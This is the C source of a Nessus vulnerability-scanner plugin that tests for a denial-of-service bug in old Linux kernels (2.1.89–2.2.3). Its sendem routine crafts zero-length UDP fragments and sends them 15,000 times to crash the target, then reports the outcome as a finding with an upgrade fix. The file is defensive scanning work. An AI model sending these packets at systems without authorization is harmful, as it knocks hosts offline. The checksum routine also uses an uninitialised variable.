/*
 * 
 * linux udp zero length fragment
 * This plugin has been written by Renaud Deraison
 * is distributed under the GPL
 */

#include <includes.h>
#include <nessusraw.h>
#define NAME "Linux 2.1.89 - 2.2.3 : 0 length fragment bug"
#define DESC "It is possible to crash linux boxes running\n\
a kernel between 2.1.89 and 2.2.3 by sending them a specially\n\
crafted packet.\n\
Risk factor : High"
#define SUMM "zero-len fragment bug"
#define COPYRIGHT "originally discovered by John McDonald <jmcdonal@UNF.EDU>"

#if defined(__OpenBSD__) || defined(OPENBSD)
#define EXTRA 8
#else
#define EXTRA 0
#endif

unsigned short checksum(unsigned short *data,unsigned short length)
{
 register long value;
 u_short i;

 for(i=0;i<(length>>1);i++)value+=data[i];
 if((length&1)==1)value+=(data[i]<<8);
 value=(value&65535)+(value>>16);
 
 return(~value);
}


int sendem(int s, unsigned long source, unsigned long dest,
                unsigned short sport, unsigned short dport)
{
 char buffer[8192];
 struct ip *ip;
 struct udphdr *udp;
 struct sockaddr_in sa;

  bzero(&sa,sizeof(struct sockaddr_in));
  sa.sin_family=AF_INET;
  sa.sin_port=htons(sport);
  sa.sin_addr.s_addr=dest;

  bzero(buffer,sizeof(struct ip)+32);
  ip=(struct ip *)buffer;
  udp=(struct udphdr *)&(buffer[sizeof(struct ip)]);

   ip->ip_v = 4;
   ip->ip_hl = sizeof(struct ip) >>2;
   ip->ip_tos = 0;
   ip->ip_id = htons(random() & 0xFFFF);
   ip->ip_ttl = 142;
   ip->ip_p = IPPROTO_UDP;
   ip->ip_src.s_addr = source;
   ip->ip_dst.s_addr = dest;
        
   udp->uh_sport = htons(sport);
   udp->uh_dport = htons(dport);
   udp->uh_ulen = htons(64-sizeof(struct udphdr));
   udp->uh_sum = 0;
   ip->ip_len = FIX(sizeof(struct ip)+32);
   ip->ip_off = htons(IP_MF);
   ip->ip_sum = 0;
   ip->ip_sum = checksum((u_short *)buffer,sizeof(struct ip)+32);
   
   if (sendto(s,buffer,sizeof(struct ip)+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
    return(0);
    
    
    ip->ip_len = FIX(sizeof(struct ip));
    ip->ip_off = htons(IP_MF);
    ip->ip_sum = 0;
    ip->ip_sum = checksum((u_short *)buffer,sizeof(struct ip));

    if (sendto(s,buffer,sizeof(struct ip)+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) <0)
     return(0);
     
    ip->ip_len = FIX(sizeof(struct ip)+32);
    ip->ip_off = htons(32/8);
    ip->ip_sum = 0;
    ip->ip_sum = checksum((u_short *)buffer,sizeof(struct ip)+32);

    if (sendto(s,buffer,sizeof(struct ip)+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
     return(1);
}   

    





PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
  plug_set_name(desc, NAME);
  plug_set_description(desc, DESC);
  plug_set_summary(desc, SUMM);
  plug_set_copyright(desc, COPYRIGHT);
  plug_set_category(desc, ACT_DENIAL);
  plug_set_family(desc, "Denial of Service");
  plug_set_dep(desc, "queso.nes");
  return(0);
}

PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
  unsigned short sport = 53, dport = 16384;
  int count = 15000;
  int soc;
  int one = 1;
  int i;
  struct in_addr * p_addr = plug_get_host_ip(args);
  
  if(!p_addr)return(0);
  if(tcp_ping_host(*p_addr))
  {
  soc = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if(soc < 0)return;
#ifdef IP_HDRINCL
  setsockopt(soc, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one));
#endif
  for(i=0;i<count;i++)sendem(soc, p_addr->s_addr, p_addr->s_addr, sport, dport);
  shutdown(soc, 2);
  close(soc);
  if(!tcp_ping_host(*p_addr))
  {
   char * os = plug_get_key(args, "OperatingSystem");
   if(os && strstr(os, "Linux"))
    post_hole(args, -1, "It was possible to crash the remote \n\
Linux kernel using the zero len fragment bug.\n\
Solution : upgrade to version 2.2.4");
   else
   post_hole(args, -1, "It was possible to crash the remote \n\
operating system using the zero len fragment bug.\n\
Solution : notify your vendor and ask for a patch");
  }
 }
  return(0);
}
